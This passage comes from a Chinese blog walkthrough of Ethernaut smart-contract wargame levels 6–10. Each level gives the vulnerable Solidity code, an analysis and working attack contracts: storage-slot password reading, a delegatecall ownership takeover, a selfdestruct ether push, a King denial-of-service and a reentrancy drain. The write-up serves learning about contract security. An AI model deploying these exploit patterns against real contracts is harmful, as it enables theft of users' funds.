<h2 id="Attack-5"><a href="#Attack-5" class="headerlink" title="Attack"></a>Attack</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line">pragma solidity ^0.6.0;</span><br><span class="line"></span><br><span class="line">contract Vault &#123;</span><br><span class="line">  bool public locked;</span><br><span class="line">  bytes32 private password;</span><br><span class="line"></span><br><span class="line">  constructor(bytes32 _password) public &#123;</span><br><span class="line">    locked = true;</span><br><span class="line">    password = _password;</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  function unlock(bytes32 _password) public &#123;</span><br><span class="line">    if (password == _password) &#123;</span><br><span class="line">      locked = false;</span><br><span class="line">    &#125;</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br><span class="line">contract attack&#123;</span><br><span class="line">    Vault constant private target=Vault(0xB873A0f46Db8182Bdb4EAd9f95742EaeaBB5295C);</span><br><span class="line">    function unlock(bytes32 _password) public &#123;</span><br><span class="line">        target.unlock(_password);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> web3 <span class="keyword">import</span> Web3,HTTPProvider</span><br><span class="line"><span class="keyword">import</span> json</span><br><span class="line">http = <span class="string">&#x27;https://rinkeby.infura.io/v3/538e5cfe4f9a402cbc81eeb8205254ab&#x27;</span></span><br><span class="line">web3 = Web3(HTTPProvider(http))</span><br><span class="line">trade_hash = <span class="string">&#x27;0x119ce1ec582b1672346a2e40ad31bac13a104e047bb2b5ce53c7f46918bddc51&#x27;</span></span><br><span class="line"></span><br><span class="line"><span class="built_in">print</span>(web3.eth.getTransaction(trade_hash))</span><br><span class="line"><span class="built_in">print</span>(web3.eth.getTransactionReceipt(trade_hash))</span><br><span class="line"><span class="built_in">print</span>(web3.eth.getStorageAt(<span class="string">&quot;0xB873A0f46Db8182Bdb4EAd9f95742EaeaBB5295C&quot;</span>, <span class="string">&quot;1&quot;</span>))//获得存储在slot1下的_password，结果为：A very strong secret password :)</span><br><span class="line"><span class="built_in">print</span>(binascii.b2a_hex(web3.eth.getStorageAt(<span class="string">&quot;0xB873A0f46Db8182Bdb4EAd9f95742EaeaBB5295C&quot;</span>, <span class="string">&quot;1&quot;</span>)))//获得存储在slot1下的_password并转为<span class="number">16</span>进制，结果为：(0x)412076657279207374726f6e67207365637265742070617373776f7264203a29，注意在开头添加0x</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p><a target="_blank" rel="noopener" href="https://www.cnblogs.com/baxianhua/p/10593766.html">python将字符串转为16进制学习链接</a></p>
<p><img src="https://storage.tttang.com/media/attachment/2022/04/08/16d5f4a3-eee1-41d9-be37-72e59794ccf9.png" alt="image.png"></p>
<p>接下来部署攻击合约并传入相应结果，通过本关</p>
<h1 id="7-Delegation"><a href="#7-Delegation" class="headerlink" title="7.Delegation"></a>7.Delegation</h1><p>题目要求：这一关的目标是申明你对你创建实例的所有权.</p>
<p> 这可能有帮助</p>
<ul>
<li>仔细看solidity文档关于 <code>delegatecall</code> 的低级函数, 他怎么运行的, 他如何将操作委托给链上库, 以及他对执行的影响.</li>
<li>Fallback 方法</li>
<li>方法 ID</li>
</ul>
<h2 id="Code-6"><a href="#Code-6" class="headerlink" title="Code"></a>Code</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><span class="line">pragma solidity ^0.6.0;</span><br><span class="line"></span><br><span class="line">contract Delegate &#123;</span><br><span class="line"></span><br><span class="line">  address public owner;</span><br><span class="line"></span><br><span class="line">  constructor(address _owner) public &#123;</span><br><span class="line">    owner = _owner;</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  function pwn() public &#123;</span><br><span class="line">    owner = msg.sender;</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">contract Delegation &#123;</span><br><span class="line"></span><br><span class="line">  address public owner;</span><br><span class="line">  Delegate delegate;</span><br><span class="line"></span><br><span class="line">  constructor(address _delegateAddress) public &#123;</span><br><span class="line">    delegate = Delegate(_delegateAddress);</span><br><span class="line">    owner = msg.sender;</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  fallback() external &#123;</span><br><span class="line">    (bool result,) = address(delegate).delegatecall(msg.data);</span><br><span class="line">    if (result) &#123;</span><br><span class="line">      this;</span><br><span class="line">    &#125;</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h2 id="Analyze-6"><a href="#Analyze-6" class="headerlink" title="Analyze"></a>Analyze</h2><p><a target="_blank" rel="noopener" href="https://blog.csdn.net/powervip/article/details/104330170">三种调用方式的异同点</a></p>
<ul>
<li>call: 最常用的调用方式，调用后内置变量 msg 的值会修改为调用者，执行环境为被调用者的运行环境(合约的 storage)。</li>
<li>delegatecall: 调用后内置变量 msg 的值不会修改为调用者，但执行环境为调用者的运行环境。</li>
<li>callcode: 调用后内置变量 msg 的值会修改为调用者，但执行环境为调用者的运行环境。+</li>
</ul>
<hr>
<p><img src="https://storage.tttang.com/media/attachment/2022/04/08/be0e64d5-9233-474c-b27d-22e49fa36ac7.png" alt="image.png"></p>
<p>情况 1：call<br>A合约：<br>temp1 &#x3D; 0<br>temp2 &#x3D; 0</p>
<p>B合约：<br>temp1 &#x3D; A合约地址<br>temp2 &#x3D; 100</p>
<p>说明：call调用后内置变量 msg 的值会修改为调用者（A合约地址），执行环境为被调用者（B合约）的运行环境(运行环境指合约的 storage)</p>
<hr>
<p><img src="https://storage.tttang.com/media/attachment/2022/04/08/748d8dc2-c3c5-45e9-9c80-33936f46043d.png" alt="image.png"></p>
<p>情况 2：delegatecall<br>A合约：<br>temp1 &#x3D; 调用A合约的以太坊账号地址<br>temp2 &#x3D; 100</p>
<p>B合约：<br>temp1 &#x3D; 0<br>temp2 &#x3D; 0</p>
<p>说明：delegatecall调用后内置变量 msg 的值不会修改为调用者（A合约地址），但执行环境为调用者（A合约）的运行环境<img src="https://storage.tttang.com/media/attachment/2022/04/08/b5974b3f-e34a-4d64-a2b4-d20f0666d40d.png" alt="image.png"></p>
<p><strong>情况 3：callcode</strong><br>A合约：<br>temp1 &#x3D; A合约地址<br>temp2 &#x3D; 100</p>
<p>B合约：<br>temp1 &#x3D; 0<br>temp2 &#x3D; 0</p>
<p>说明：callcode调用后内置变量 msg 的值会修改为调用者（A合约地址），但执行环境为调用者（A合约）的运行环境。</p>
<hr>
<h2 id="Attack-6"><a href="#Attack-6" class="headerlink" title="Attack"></a>Attack</h2><p>poc1</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">首先学习将函数转换为bytes格式</span><br><span class="line">contract transform&#123;</span><br><span class="line">    bytes4 public result;</span><br><span class="line">    function trans() public &#123;</span><br><span class="line">        result=bytes(keccak256(&quot;pwn()&quot;));</span><br><span class="line">    &#125;</span><br><span class="line">&#125;//结果为0xdd365b8b</span><br><span class="line">接下来进行攻击</span><br><span class="line">await contract.sendTransaction(&#123;data:&quot;0xdd365b8b&quot;&#125;)</span><br></pre></td></tr></table></figure>

<p>poc2</p>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/tianlongtc/article/details/80220237">call函数学习链接①</a></p>
<p><a target="_blank" rel="noopener" href="https://ethereum.stackexchange.com/questions/8168/understanding-namereg-callregister-myname-style-call-between-contracts">call函数学习链接②</a></p>
<p><a target="_blank" rel="noopener" href="https://www.cnblogs.com/gzhlt/p/9997798.html">call函数学习链接③</a></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">contract attack&#123;</span><br><span class="line">    address target =0xd2a5bC10698FD955D1Fe6cb468a17809A08fd005;</span><br><span class="line">    bytes4 public result;</span><br><span class="line">    function trandform()public&#123;</span><br><span class="line">    result=bytes4(keccak256(&quot;pwn()&quot;));</span><br><span class="line">&#125;//获得bytes4签名</span><br><span class="line">    function pwn() public payable&#123;</span><br><span class="line">    target.call(abi.encodePacked(result,&quot;&quot;));</span><br><span class="line">&#125;//传入参数进行攻击</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>



<h1 id="8-Force"><a href="#8-Force" class="headerlink" title="8.Force"></a>8.Force</h1><p>题目要求：有些合约就是拒绝你的付款,就是这么任性<code>¯\_(ツ)_/¯</code>，这一关的目标是使合约的余额大于0</p>
<p> 这可能有帮助:</p>
<ul>
<li>Fallback 方法</li>
<li>有时候攻击一个合约最好的方法是使用另一个合约.</li>
<li>阅读上方的帮助页面, “控制台之外” 部分</li>
</ul>
<h2 id="Code-7"><a href="#Code-7" class="headerlink" title="Code"></a>Code</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">pragma solidity ^0.6.0;</span><br><span class="line"></span><br><span class="line">contract Force &#123;/*</span><br><span class="line"></span><br><span class="line">                   MEOW ?</span><br><span class="line">         /\_/\   /</span><br><span class="line">    ____/ o o \</span><br><span class="line">  /~____  =ø= /</span><br><span class="line"> (______)__m_m)</span><br><span class="line"></span><br><span class="line">*/&#125;</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<h2 id="Analyze-7"><a href="#Analyze-7" class="headerlink" title="Analyze"></a>Analyze</h2><p>合约为空白合约，而题目要求是使合约余额大于0，所以想到了自毁函数，可以强制性向目标转账</p>
<h2 id="Attack-7"><a href="#Attack-7" class="headerlink" title="Attack"></a>Attack</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">pragma solidity ^0.6.0;</span><br><span class="line">contract Attack&#123;</span><br><span class="line"></span><br><span class="line">    function attack(address payable target) public payable &#123;</span><br><span class="line">        selfdestruct(target);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;//销毁当前合约，并且把当前合约的余额发送指定地址，，执行Kill方法，并指定一个address；执行后，当前合约将被销毁，当前合约的以太币将被发送至这个指定的address。且此合约不再有可执行的方法</span><br></pre></td></tr></table></figure>

<p><img src="https://storage.tttang.com/media/attachment/2022/04/08/b9fdad65-5bf9-4bb4-bd2c-9c75e0916166.png" alt="image.png"></p>
<h1 id="9-King"><a href="#9-King" class="headerlink" title="9.King"></a>9.King</h1><p>题目要求：下面的合约表示了一个很简单的游戏: 任何一个发送了高于目前价格的人将成为新的国王. 在这个情况下, 上一个国王将会获得新的出价, 这样可以赚得一些以太币. 看起来像是庞氏骗局.这么有趣的游戏, 你的目标是攻破他.当你提交实例给关卡时, 关卡会重新申明王位. 你需要阻止他重获王位来通过这一关.</p>
<h2 id="Code-8"><a href="#Code-8" class="headerlink" title="Code"></a>Code</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line">pragma solidity ^0.6.0;</span><br><span class="line"></span><br><span class="line">contract King &#123;</span><br><span class="line"></span><br><span class="line">  address payable king;</span><br><span class="line">  uint public prize;</span><br><span class="line">  address payable public owner;</span><br><span class="line"></span><br><span class="line">  constructor() public payable &#123;</span><br><span class="line">    owner = msg.sender;  </span><br><span class="line">    king = msg.sender;</span><br><span class="line">    prize = msg.value;</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  receive() external payable &#123;</span><br><span class="line">    require(msg.value &gt;= prize || msg.sender == owner);</span><br><span class="line">    king.transfer(msg.value);</span><br><span class="line">    king = msg.sender;</span><br><span class="line">    prize = msg.value;</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  function _king() public view returns (address payable) &#123;</span><br><span class="line">    return king;</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h2 id="Analyze-8"><a href="#Analyze-8" class="headerlink" title="Analyze"></a>Analyze</h2><p>实例生成后要使用web3.js查询原始的prize，分析合约可知prize存储在slot1，king存储在slot0</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> web3 <span class="keyword">import</span> Web3,HTTPProvider</span><br><span class="line"><span class="keyword">import</span> json,binascii</span><br><span class="line">http = <span class="string">&#x27;https://rinkeby.infura.io/v3/538e5cfe4f9a402cbc81eeb8205254ab&#x27;</span></span><br><span class="line">web3 = Web3(HTTPProvider(http))</span><br><span class="line"><span class="built_in">print</span>(binascii.b2a_hex(web3.eth.getStorageAt(<span class="string">&quot;0xd4c14dEeE2d55e2F999FFaAdb8d11CC7c6f67909&quot;</span>, <span class="string">&quot;1&quot;</span>)))//合约prize查询</span><br><span class="line"><span class="built_in">print</span>(binascii.b2a_hex(web3.eth.getStorageAt(<span class="string">&quot;0xd4c14dEeE2d55e2F999FFaAdb8d11CC7c6f67909&quot;</span>, <span class="string">&quot;0&quot;</span>)))//合约中的king查询</span><br></pre></td></tr></table></figure>

<p>题目会进行king的重申，而transfer函数不同于call和send，call和send函数执行后会返回true或者false，transfer函数执行失败后会进行回滚(revert)所以我们将king变成自己后提交实例时要阻止关卡对于king的重申，简单来说就是让关卡触发receive函数时失败。此时这道题有两个切入点①可以使用require(false),使得transfer函数发生回滚切入点②直接使用revert让关卡在想攻击合约转账时失败以上两种方法可以使漏洞合约中的transfer函数执行失败从而进行回滚导致king的重申失败</p>
<p>了解到了，transfer执行失败后会回滚transfer之前的代码(但是transfer本身不会进行回滚)(这是自己的理解，应该是正确的)</p>
<h2 id="Attack-8"><a href="#Attack-8" class="headerlink" title="Attack"></a>Attack</h2><p>poc1</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">contract attack&#123;</span><br><span class="line">    address target =0xd4c14dEeE2d55e2F999FFaAdb8d11CC7c6f67909;</span><br><span class="line">    function attack() payable public &#123;</span><br><span class="line">        target.call&#123;value : 0.001 ether&#125;(&quot;&quot;);</span><br><span class="line">    &#125;</span><br><span class="line">    fallback() external payable &#123;</span><br><span class="line">        require(false);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>poc2</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">contract attack&#123;</span><br><span class="line">    address target =0xd4c14dEeE2d55e2F999FFaAdb8d11CC7c6f67909;</span><br><span class="line">    function attack() payable public &#123;</span><br><span class="line">        target.call&#123;value : 0.001 ether&#125;(&quot;&quot;);</span><br><span class="line">    &#125;</span><br><span class="line">    fallback() external payable &#123;</span><br><span class="line">        revert();</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>写好攻击合约后进行了n+n次攻击，evm中显示交易成功但是_king始终不变，卡住了约两个小时以后打开了etherscan发现了万恶的<em>Out Of Gas</em>问题</p>
<p><img src="https://storage.tttang.com/media/attachment/2022/04/08/2a90113e-a2c0-4a57-9f90-1e827d50c6bd.png" alt="image.png"></p>
<p>调高gas限制后再次尝试成功</p>
<p><img src="https://storage.tttang.com/media/attachment/2022/04/08/b0f94b2b-ba04-4413-8316-6e963ff74339.png" alt="image.png"></p>
<p><img src="https://storage.tttang.com/media/attachment/2022/04/08/47eb5c7e-35f3-4776-9037-84c4b22f27fc.png" alt="image.png"></p>
<h1 id="10-Re-entrancy"><a href="#10-Re-entrancy" class="headerlink" title="10.Re-entrancy"></a>10.Re-entrancy</h1><p>题目要求：这一关的目标是偷走合约的所有资产.</p>
<h2 id="Code-9"><a href="#Code-9" class="headerlink" title="Code"></a>Code</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line">pragma solidity ^0.6.0;</span><br><span class="line"></span><br><span class="line">import &#x27;@openzeppelin/contracts/math/SafeMath.sol&#x27;;</span><br><span class="line"></span><br><span class="line">contract Reentrance &#123;</span><br><span class="line">  </span><br><span class="line">  using SafeMath for uint256;</span><br><span class="line">  mapping(address =&gt; uint) public balances;</span><br><span class="line"></span><br><span class="line">  function donate(address _to) public payable &#123;</span><br><span class="line">    balances[_to] = balances[_to].add(msg.value);</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  function balanceOf(address _who) public view returns (uint balance) &#123;</span><br><span class="line">    return balances[_who];</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  function withdraw(uint _amount) public &#123;</span><br><span class="line">    if(balances[msg.sender] &gt;= _amount) &#123;</span><br><span class="line">      (bool result,) = msg.sender.call&#123;value:_amount&#125;(&quot;&quot;);</span><br><span class="line">      if(result) &#123;</span><br><span class="line">        _amount;</span><br><span class="line">      &#125;</span><br><span class="line">      balances[msg.sender] -= _amount;</span><br><span class="line">    &#125;</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  receive() external payable &#123;&#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h2 id="Analyze-9"><a href="#Analyze-9" class="headerlink" title="Analyze"></a>Analyze</h2><p>经典的重入漏洞，使用了call转账，并且balances[msg.sender]在转账完成之后才进行更新，所以攻击合约中的fallback可以进行重入</p>
<h2 id="Attack-9"><a href="#Attack-9" class="headerlink" title="Attack"></a>Attack</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line">contract attack&#123;</span><br><span class="line">    test constant private target=test(0xEdBA908c98185b82b1aBb31AFAF66B2f415491B2);</span><br><span class="line">    function cunqian() public payable&#123;</span><br><span class="line">        target.donate&#123;value: 0.001 ether&#125;(address(this));</span><br><span class="line">    &#125;</span><br><span class="line">    function tuiqian()public&#123;</span><br><span class="line">        target.withdraw(0.001 ether);</span><br><span class="line">    &#125;</span><br><span class="line">    function check() public view returns(uint)&#123;</span><br><span class="line">        return address(this).balance;</span><br><span class="line">    &#125;</span><br><span class="line">    fallback() external payable&#123;</span><br><span class="line">        if(address(0xEdBA908c98185b82b1aBb31AFAF66B2f415491B2).balance&gt;=0.001 ether)</span><br><span class="line">        target.withdraw(0.001 ether);</span><br><span class="line">    &#125;</span><br><span class="line">     function reuse() public &#123;</span><br><span class="line">        msg.sender.transfer(address(this).balance);</span><br><span class="line">    &#125;//回收再利用，勤俭节约</span><br><span class="line">    //function destroy(address payable addr)public payable&#123;</span><br><span class="line">    //    selfdestruct(addr);</span><br><span class="line">    //&#125;自毁转账法，和reuse()用途一样，回收代币(其中addr是钱包地址)</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>


    </div>

    
    
    
        

<div>
<ul class="post-copyright">
  <li class="post-copyright-author">
    <strong>本文作者： </strong>bcYng
  </li>
  <li class="post-copyright-link">
    <strong>本文链接：</strong>
    <a href="http://example.com/2022/03/19/ethernaut%E9%9D%B6%E5%9C%BA%E5%88%B7%E9%A2%98%E4%B8%8A/" title="Ethernaut靶场刷题part1">http://example.com/2022/03/19/ethernaut靶场刷题上/</a>
  </li>
  <li class="post-copyright-license">
    <strong>版权声明： </strong>本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/zh-CN" rel="noopener" target="_blank"><i class="fab fa-fw fa-creative-commons"></i>BY-NC-SA</a> 许可协议。转载请注明出处！
  </li>
</ul>
</div>


      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/%E5%8C%BA%E5%9D%97%E9%93%BE/" rel="tag"># 区块链</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2022/03/19/ethernaut/" rel="prev" title="Ethernaut靶场刷题part3/3">
      <i class="fa fa-chevron-left"></i> Ethernaut靶场刷题part3/3
    </a></div>
      <div class="post-nav-item">
    <a href="/2022/03/19/ethernaut%E9%9D%B6%E5%9C%BA%E5%88%B7%E9%A2%98%E4%B8%8B/" rel="next" title="">
       <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#1-fallback"><span class="nav-number">1.</span> <span class="nav-text">1.fallback</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#Code"><span class="nav-number">1.1.</span> <span class="nav-text">Code</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Analyze"><span class="nav-number">1.2.</span> <span class="nav-text">Analyze</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Attack"><span class="nav-number">1.3.</span> <span class="nav-text">Attack</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#2-fallout"><span class="nav-number">2.</span> <span class="nav-text">2.fallout</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#Code-1"><span class="nav-number">2.1.</span> <span class="nav-text">Code</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Analyze-1"><span class="nav-number">2.2.</span> <span class="nav-text">Analyze</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Attack-1"><span class="nav-number">2.3.</span> <span class="nav-text">Attack</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#2-coin-flip"><span class="nav-number">3.</span> <span class="nav-text">2.coin flip</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#Code-2"><span class="nav-number">3.1.</span> <span class="nav-text">Code</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Analyze-2"><span class="nav-number">3.2.</span> <span class="nav-text">Analyze</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Attack-2"><span class="nav-number">3.3.</span> <span class="nav-text">Attack</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#4-Telephone"><span class="nav-number">4.</span> <span class="nav-text">4.Telephone</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#Code-3"><span class="nav-number">4.1.</span> <span class="nav-text">Code</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Analyze-3"><span class="nav-number">4.2.</span> <span class="nav-text">Analyze</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Attack-3"><span class="nav-number">4.3.</span> <span class="nav-text">Attack</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#5-Token"><span class="nav-number">5.</span> <span class="nav-text">5.Token</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#Code-4"><span class="nav-number">5.1.</span> <span class="nav-text">Code</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Analyze-4"><span class="nav-number">5.2.</span> <span class="nav-text">Analyze</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Attack-4"><span class="nav-number">5.3.</span> <span class="nav-text">Attack</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#6-Vault"><span class="nav-number">6.</span> <span class="nav-text">6.Vault</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#Code-5"><span class="nav-number">6.1.</span> <span class="nav-text">Code</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Analyze-5"><span class="nav-number">6.2.</span> <span class="nav-text">Analyze</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Attack-5"><span class="nav-number">6.3.</span> <span class="nav-text">Attack</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#7-Delegation"><span class="nav-number">7.</span> <span class="nav-text">7.Delegation</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#Code-6"><span class="nav-number">7.1.</span> <span class="nav-text">Code</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Analyze-6"><span class="nav-number">7.2.</span> <span class="nav-text">Analyze</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Attack-6"><span class="nav-number">7.3.</span> <span class="nav-text">Attack</span></a></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#8-Force"><span class="nav-number">8.</span> <span class="nav-text">8.Force</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#Code-7"><span class="nav-number">8.1.</span> <span class="nav-text">Code</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Analyze-7"><span class="nav-number">8.2.</span> <span class="nav-text">Analyze</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Attack-7"><span class="nav-number">8.3.</span> 